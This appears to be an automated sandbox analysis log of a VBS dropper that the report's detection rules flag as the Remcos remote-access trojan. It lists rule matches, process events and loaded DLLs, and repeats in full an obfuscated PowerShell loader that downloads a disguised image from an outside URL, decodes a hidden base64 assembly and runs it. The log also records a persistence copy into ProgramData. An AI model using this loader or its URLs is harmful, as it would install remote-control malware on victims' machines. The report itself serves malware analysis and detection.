Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@21/10@7/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\VBScripting
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7812:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmcghdzxtrswtwg-BJ2KPV
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1hmz0p4.qq3.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe wscript.exe C:\ProgramData\talpe.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\talpe.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ajul.vbs"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
